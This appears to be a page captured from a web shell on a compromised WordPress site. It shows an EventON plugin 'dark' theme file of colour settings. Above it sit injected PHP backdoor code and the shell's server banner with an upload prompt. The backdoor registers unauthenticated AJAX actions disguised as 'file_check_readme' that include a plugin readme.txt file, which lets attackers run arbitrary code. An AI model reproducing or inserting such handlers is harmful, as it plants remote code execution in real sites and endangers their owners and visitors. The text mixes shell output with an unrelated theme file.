if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs_tmp/wp-content/plugins/eventON/themes/dark.php
<?php
/**
 * @theme: 		Dark
 * @updated:	2.2.30
 */
	
$theme = array(
	'evcal_hexcode'=>'ECECEC',
	// month year lable text
	'evcal__jm005'=>'414141',

	// event top
	// event title
	'evcal__fc3'=>'FFFFFF',
	//eventtop background
	'evcal__bgc4'=>'474747',
	'evcal__bgc4h'=>'616161',
	//border
	'evcal__evcbrb0'=>'000000',

	'evcal__fc6'=>'FFFFFF',
	'evcal__fc2'=>'FFFFFF',
	// subtitle
	'evcal__fc3st'=>'EDEDED',
	//category title color
	'evcal__fc7'=>'B5B5B5',
	// sort section
	'evcal__sot'=>'919191',
	//jump month section
	'evcal__jm002'=>'6E6E6E',
	'evcal__jm002H'=>'737070',	
	'evcal__jm005'=>'888888',//label	
	'evcal__jm004'=>'3A3A3A',//button bg	
	'evcal__jm009'=>'6C6C6C',//button bg active
	'evcal__jm007'=>'B2B2B2',//button bg current	

	// event card
	'evcal__bc1'=>'282828',
	'evcal__bc1_rgb'=>'40,40,40',
	'evcal__bc1H'=>'3A3A3A',
	'evcal__evcbrb'=>'4F4F4F',
	'evcal__fc4'=>'A9A9A9',// section titles
	'evcal__fc5'=>'8C8C8C',// section titles
	'evcal_closebtn'=>'303030',// close button
	'evcal_closebtnx'=>'4F4E4E',// close button H

	//get directions
	'evcal_getdir_001'=>'4F4E4E',
	'evcal_getdir_002'=>'D2D2D2',
	'evcal_getdir_003'=>'C0C0C0',

	// arrows	
	'evcal__jm011'=>'2C2C2C', // bg
	'evcal__jm011H'=>'737373',
	'evcal__jm01A'=>'f0f0f0',//arrowline
	'evcal__jm010'=>'868686', //line
	'evcal__jm010H'=>'A6A6A6',


	// single events addition
	'evose_3'=>'2C2C2C',
	'evose_4'=>'4F4F4F',
	'evose_5'=>'4F4F4F',

	// single events addition
	'evose_3'=>'2C2C2C',
	'evose_4'=>'4F4F4F',
	'evose_5'=>'4F4F4F',

	// canceled events
	'evcal__cancel_event_3'=>'2b2b2b',
	'evcal__cancel_event_4'=>'383738',
);

?>